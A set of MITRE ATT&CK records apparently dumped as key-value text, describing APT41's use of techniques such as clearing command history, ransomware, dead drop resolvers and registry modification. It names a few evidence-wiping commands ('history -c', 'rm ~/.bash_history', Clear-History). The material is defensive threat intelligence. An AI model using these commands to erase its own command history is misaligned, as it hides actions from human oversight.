external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by deleting Bash histories.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--f8838a1f-3a62-40cc-98dd-55943091fcef
revoked : False
technique : Clear Command History
technique_description : In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.

On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions.

Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file <code>rm ~/.bash_history</code>.  

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).(Citation: US-CERT-TA18-106A)

On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.

The <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)

Adversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1070.003
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['File: File Deletion', 'File: File Modification', 'Command: Command Execution', 'User Account: User Account Authentication']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used <code>cmd.exe /c</code> to execute commands on remote machines.(Citation: FireEye APT41 Aug 2019)
[APT41](https://attack.mitre.org/groups/G0096) used a batch file to install persistence for the [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--81a15403-9bb3-408a-8da6-97c64209c829
revoked : False
technique : Windows Command Shell
technique_description : Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)

Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.003
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Command: Command Execution', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--acfaf7ec-7b92-40ec-a844-17089791a663
revoked : False
technique : Data Encrypted for Impact
technique_description : Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)

In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) 

To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)

In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='impact')]
technique_id : T1486
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'IaaS']
data_sources : ['File: File Modification', 'Cloud Storage: Cloud Storage Modification', 'Network Share: Network Share Access', 'File: File Creation', 'Command: Command Execution', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--964a9222-6e88-4850-89cc-6fc0f10ee4c9
revoked : False
technique : Dead Drop Resolver
technique_description : Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1102.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deployed a Monero cryptocurrency mining tool in a victim’s environment.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--9ebc2d8a-a945-4b5d-805f-56e16bcc6676
revoked : False
technique : Resource Hijacking
technique_description : Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 

One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)

Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)

Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='impact')]
technique_id : T1496
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Containers']
data_sources : ['Network Traffic: Network Traffic Flow', 'File: File Creation', 'Network Traffic: Network Connection Creation', 'Sensor Health: Host Status', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) created a RAR archive of targeted files for exfiltration.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--89328749-11c5-416d-99b9-f3039afc487a
revoked : False
technique : Archive via Utility
technique_description : Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.

Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems. 

On Windows, <code>diantz</code> or <code> makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. 

Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection')]
technique_id : T1560.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a malware variant called GOODLUCK to modify the registry in order to steal credentials.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--c8475b1b-c98f-4fdc-89dd-c9b04e6fbd9c
revoked : False
technique : Modify Registry
technique_description : Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1112
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: OS API Execution', 'Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Windows Registry: Windows Registry Key Deletion', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
